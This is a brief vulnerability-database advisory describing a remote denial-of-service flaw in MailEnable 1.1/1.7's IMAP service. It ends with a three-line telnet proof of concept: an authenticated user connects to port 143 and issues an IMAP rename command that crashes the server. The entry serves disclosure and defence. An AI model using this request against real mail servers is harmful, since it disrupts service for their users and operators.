MailEnable 1.1/1.7 IMAP Rename Request Remote Denial of Service Vulnerability

ID SSV:80205
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


MailEnable is prone to a remote denial of service vulnerability.

The vulnerability presents itself when a user issues a malicious rename request following authentication.

Remote attackers can exploit this issue to trigger a denial of service condition. 

telnet localhost 143
a1 login josh byebye
a2 rename foo bar

where josh and byebye are the login credentials for an existing mailbox.